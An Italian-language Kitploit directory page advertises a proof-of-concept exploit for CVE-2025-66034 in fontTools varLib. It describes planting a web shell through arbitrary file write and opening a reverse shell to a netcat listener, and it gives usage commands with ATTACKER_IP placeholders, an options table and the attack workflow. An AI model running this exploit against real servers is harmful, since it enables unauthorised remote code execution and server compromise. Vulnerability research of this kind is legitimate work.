Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
varlib-cve-2025-66034 — Exploit proof-of-concept per CVE-2025-66034 nella pipeline di generazione dei font variabili di fontTools. Un file .designspace appositamente realizzato consente di controllare il percorso di output, abilitando la scrittura arbitraria di file. Lo script automatizza la creazione del payload, la generazione dei font e il caricamento per dimostrare il problema. | Kitploit
Strumenti/GitHubGitHub/symphony2colour/varlib-cve-2025-66034
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubsymphony2colour/varlib-cve-2025-66034

varlib-cve-2025-66034

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Vedi Repository
25 mesi faNon ancora revisionato

Exploit proof-of-concept per CVE-2025-66034 nella pipeline di generazione dei font variabili di fontTools. Un file .designspace appositamente realizzato consente di controllare il percorso di output, abilitando la scrittura arbitraria di file. Lo script automatizza la creazione del payload, la generazione dei font e il caricamento per dimostrare il problema.

Condividi

Exploit fontTools varLib CVE-2025-66034

cve component vulnerability vector impact language dependency license

Questa repository non introduce una nuova vulnerabilità.

Questo è un exploit proof-of-concept per CVE-2025-66034 che interessa la pipeline di generazione dei font variabili varLib di fontTools.

La vulnerabilità consente a un attaccante di controllare il nome del file di output all'interno di un file .designspace appositamente modificato. Quando viene elaborato da un servizio di generazione di font vulnerabile, questo può portare alla scrittura arbitraria di file sul filesystem del server.

Lo script varlib_cve_2025_66034.py automatizza la creazione del payload, la generazione dei font, l'upload e l'eventuale attivazione della shell.


Caratteristiche

  • Creazione automatica di font master compatibili tramite fontTools
  • Generazione casuale del nome del file di shell
  • Percorso di destinazione ed endpoint di upload personalizzabili
  • Listener nc automatico
  • Nessuna preparazione manuale dei font richiesta

Requisiti

Python 3.9+

Installa le dipendenze:

root@kitploit:~
pip install fonttools requests

Netcat è richiesto per il listener:


Utilizzo

Se il tuo target è un laboratorio self-hosted su mysite.com e il percorso di upload, il percorso di scrittura sul filesystem e il percorso di trigger accessibile via web corrispondono a quelli predefiniti nello script, puoi eseguirlo direttamente.

Utilizzo di base:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>

È molto probabile che il target utilizzi URL o percorsi filesystem diversi: sovrascrivi le impostazioni predefinite con le opzioni disponibili di seguito, come --url, --path e --trigger, oppure modifica lo script manualmente

Nota: i nomi dei campi del modulo di upload multipart possono variare a seconda dell'ambiente. Se il target non utilizza gli stessi nomi di campo dello script, modificali nella sezione files prima di eseguire l'exploit.

Opzioni

Esempio con opzioni personalizzate:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com

Flusso di lavoro dell'exploit

  1. Generare font master compatibili
  2. Creare un file .designspace dannoso
  3. Caricare il payload tramite POST multipart
  4. Scrivere un file arbitrario sul server
  5. Attivare il payload tramite richiesta HTTP

Crediti / Ringraziamenti

Un ringraziamento speciale e rispetto a:

  • I maintainer e i contributori del progetto fontTools per il loro lavoro sulla libreria open-source fontTools.
  • I ricercatori di sicurezza che hanno scoperto e divulgato in modo responsabile CVE-2025-66034.
  • La comunità open-source della sicurezza per aver documentato e analizzato le vulnerabilità che aiutano a migliorare la sicurezza del software.

Questo proof-of-concept è fornito a scopo educativo e di ricerca per aiutare a comprendere la vulnerabilità e il suo impatto.


Dichiarazione di non responsabilità

Questo codice è fornito solo a scopo educativo e di ricerca.

Non utilizzare questo exploit contro sistemi che non possiedi o per i quali non hai un'autorizzazione esplicita a testarli.

L'autore non è responsabile per un uso improprio o danni causati da questo software.


Riferimenti

  • Dettagli CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
  • Avviso GitHub: https://github.com/advisories/GHSA-768j-98cg-p3fv
  • Progetto fontTools: https://github.com/fonttools/fonttools
  • Documentazione fontTools: https://fonttools.readthedocs.io/
Scarica lo strumento
ArgomentoDescrizione
--ipIP del listener dell'attaccante
--portPorta del listener
--pathPercorso filesystem di destinazione in cui verrà scritto il file (deve essere accessibile via web per attivare una web shell)
--urlEndpoint di upload, il modulo può variare
--triggerURL di base utilizzato per attivare il payload scritto dopo l'upload
--no-listenDisabilita il listener netcat automatico